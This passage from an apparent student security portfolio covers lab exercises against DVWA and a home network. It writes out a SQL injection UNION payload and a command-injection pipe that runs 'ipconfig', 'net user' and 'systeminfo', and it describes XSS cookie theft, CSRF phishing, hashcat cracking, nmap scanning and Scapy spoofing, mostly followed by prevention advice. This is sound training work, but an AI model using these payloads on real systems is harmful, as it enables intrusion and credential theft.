          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
